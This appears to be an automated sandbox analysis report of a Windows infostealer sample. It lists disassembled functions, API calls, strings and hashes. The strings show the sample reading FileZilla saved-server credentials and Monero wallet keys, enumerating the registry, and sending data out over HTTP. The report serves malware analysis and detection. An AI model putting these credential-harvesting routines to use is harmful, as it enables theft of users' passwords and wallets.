                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb068d4137ebb2dd017403f0c1ed8ead79586f027979ad597b1c56b00f4f15fe
                                        • Instruction ID: f5b09df3d574bb6d5024e604c071f181fa4aec88770cbc666afd278ecc6cc0a5
                                        • Opcode Fuzzy Hash: eb068d4137ebb2dd017403f0c1ed8ead79586f027979ad597b1c56b00f4f15fe
                                        • Instruction Fuzzy Hash: DF5134F250C205DFD204BE28DC81A3AB3A5EBA0B10F36492DD6CA97604E675E641A773
                                        Function 00CBFE5E Relevance: .2, Instructions: 175COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f841f2ecbe13936f5aafed7eb4d47db3240f4217ef3ff2aa0c85d891c571a059
                                        • Instruction ID: c6f00198d71184589dc98f8e15b6cf24e7cfaf2d20c85f469bde7aeaab9e1730
                                        • Opcode Fuzzy Hash: f841f2ecbe13936f5aafed7eb4d47db3240f4217ef3ff2aa0c85d891c571a059
                                        • Instruction Fuzzy Hash: 875136F3D086145BF3106E2AEC84766FBD6EBD0320F1B863DDEC893744EA7658058686
                                        Function 00929750 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Function 00920250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00930DBA,00930DB7,00930DB6,00930DB3), ref: 00920362
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00920369
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00920385
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920393
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 009203CF
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 009203DD
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00920419
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920427
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00920463
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920475
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920502
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092051A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920532
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092054A
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00920562
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00920571
                                        • lstrcat.KERNEL32(?,url: ), ref: 00920580
                                        • lstrcat.KERNEL32(?,00000000), ref: 00920593
                                        • lstrcat.KERNEL32(?,00931678), ref: 009205A2
                                        • lstrcat.KERNEL32(?,00000000), ref: 009205B5
                                        • lstrcat.KERNEL32(?,0093167C), ref: 009205C4
                                        • lstrcat.KERNEL32(?,login: ), ref: 009205D3
                                        • lstrcat.KERNEL32(?,00000000), ref: 009205E6
                                        • lstrcat.KERNEL32(?,00931688), ref: 009205F5
                                        • lstrcat.KERNEL32(?,password: ), ref: 00920604
                                        • lstrcat.KERNEL32(?,00000000), ref: 00920617
                                        • lstrcat.KERNEL32(?,00931698), ref: 00920626
                                        • lstrcat.KERNEL32(?,0093169C), ref: 00920635
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092068E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: ca8ac9698af08c0c7dce13d598d73803343f029c8abc8ac4cd11a1d72a6e712c
                                        • Instruction ID: 17e54a11c66e77ff4e31d8d1aff74c70bf533161539f488a5ae17bae6228700c
                                        • Opcode Fuzzy Hash: ca8ac9698af08c0c7dce13d598d73803343f029c8abc8ac4cd11a1d72a6e712c
                                        • Instruction Fuzzy Hash: 6ED11F72900218ABCB04FBF4ED96FEE7779AF98301F504558F102B7099DE74AA06CB65
                                        Function 00915960 Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 495networkstringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009159F8
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00915A13
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00915B93
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,006BE998,00000000,?,006BA300,00000000,?,00931A1C), ref: 00915E71
                                        • lstrlen.KERNEL32(00000000), ref: 00915E82
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00915E93
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00915E9A
                                        • lstrlen.KERNEL32(00000000), ref: 00915EAF
                                        • lstrlen.KERNEL32(00000000), ref: 00915ED8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00915EF1
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00915F1B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00915F2F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00915F4C
                                        • InternetCloseHandle.WININET(00000000), ref: 00915FB0
                                        • InternetCloseHandle.WININET(00000000), ref: 00915FBD
                                        • HttpOpenRequestA.WININET(00000000,006BEA78,?,006BE230,00000000,00000000,00400100,00000000), ref: 00915BF8
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00915FC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------$0k$xk
                                        • API String ID: 874700897-1840268369
                                        • Opcode ID: 91fc445e031691466a2efe776fd31099e68a2023924f5c1673feb997971c4ed1
                                        • Instruction ID: 23639cd5d8948d6d5edf1cd64ff3d887ae812cf90004cfa2c45df533a91396ec
                                        • Opcode Fuzzy Hash: 91fc445e031691466a2efe776fd31099e68a2023924f5c1673feb997971c4ed1
                                        • Instruction Fuzzy Hash: 1212EF72921128ABDB15EBA0EC96FEEB378BF94700F504199F10673095EF702A49CF65
                                        Function 0091CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091CF83
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0091D0C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0091D0CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D208
                                        • lstrcat.KERNEL32(?,00931478), ref: 0091D217
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D22A
                                        • lstrcat.KERNEL32(?,0093147C), ref: 0091D239
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D24C
                                        • lstrcat.KERNEL32(?,00931480), ref: 0091D25B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D26E
                                        • lstrcat.KERNEL32(?,00931484), ref: 0091D27D
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D290
                                        • lstrcat.KERNEL32(?,00931488), ref: 0091D29F
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D2B2
                                        • lstrcat.KERNEL32(?,0093148C), ref: 0091D2C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D2D4
                                        • lstrcat.KERNEL32(?,00931490), ref: 0091D2E3
                                          • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                                          • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                                        • lstrlen.KERNEL32(?), ref: 0091D32A
                                        • lstrlen.KERNEL32(?), ref: 0091D339
                                          • Part of subcall function 0092AA70: StrCmpCA.SHLWAPI(006B8F08,0091A7A7,?,0091A7A7,006B8F08), ref: 0092AA8F
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091D3B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: cd1201170ea637a319a6a567db78115cb39937a035e1c0b714056fc1dbb92a1a
                                        • Instruction ID: e625975592d2bb82614feec4c59a5a0d99e1038bb435898609380b20066e7982
                                        • Opcode Fuzzy Hash: cd1201170ea637a319a6a567db78115cb39937a035e1c0b714056fc1dbb92a1a
                                        • Instruction Fuzzy Hash: B2E1FD72910218ABCB04FBA0ED96FEE7379BF94301F104158F106B70A5DE35AE49CB66
                                        Function 00928320 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 196registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • RegOpenKeyExA.ADVAPI32(00000000,006BB188,00000000,00020019,00000000,009305B6), ref: 009283A4
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                                        • wsprintfA.USER32 ref: 00928459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?$@k
                                        • API String ID: 3246050789-1719912099
                                        • Opcode ID: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                                        • Instruction ID: a8df89ca92a4e5d2c8b96ac70b5115b0c6ed458a73fdc51eb5f1e5ba233a293c
                                        • Opcode Fuzzy Hash: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                                        • Instruction Fuzzy Hash: F6812B72911228ABDB24DB50DC91FEAB7B8BF48700F0086D8E109A7184DF756F85CFA5
                                        Function 0091C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006BD518,00000000,?,0093144C,00000000,?,?), ref: 0091CA6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0091CA89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0091CA95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0091CAA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0091CAD9
                                        • StrStrA.SHLWAPI(?,006BD548,00930B52), ref: 0091CAF7
                                        • StrStrA.SHLWAPI(00000000,006BD590), ref: 0091CB1E
                                        • StrStrA.SHLWAPI(?,006BDD20,00000000,?,00931458,00000000,?,00000000,00000000,?,006B8F68,00000000,?,00931454,00000000,?), ref: 0091CCA2
                                        • StrStrA.SHLWAPI(00000000,006BDD40), ref: 0091CCB9
                                          • Part of subcall function 0091C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                                          • Part of subcall function 0091C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                                        • StrStrA.SHLWAPI(?,006BDD40,00000000,?,0093145C,00000000,?,00000000,006B9078), ref: 0091CD5A
                                        • StrStrA.SHLWAPI(00000000,006B92C8), ref: 0091CD71
                                          • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                                          • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                                          • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                                        • lstrlen.KERNEL32(00000000), ref: 0091CE44
                                        • CloseHandle.KERNEL32(00000000), ref: 0091CE9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
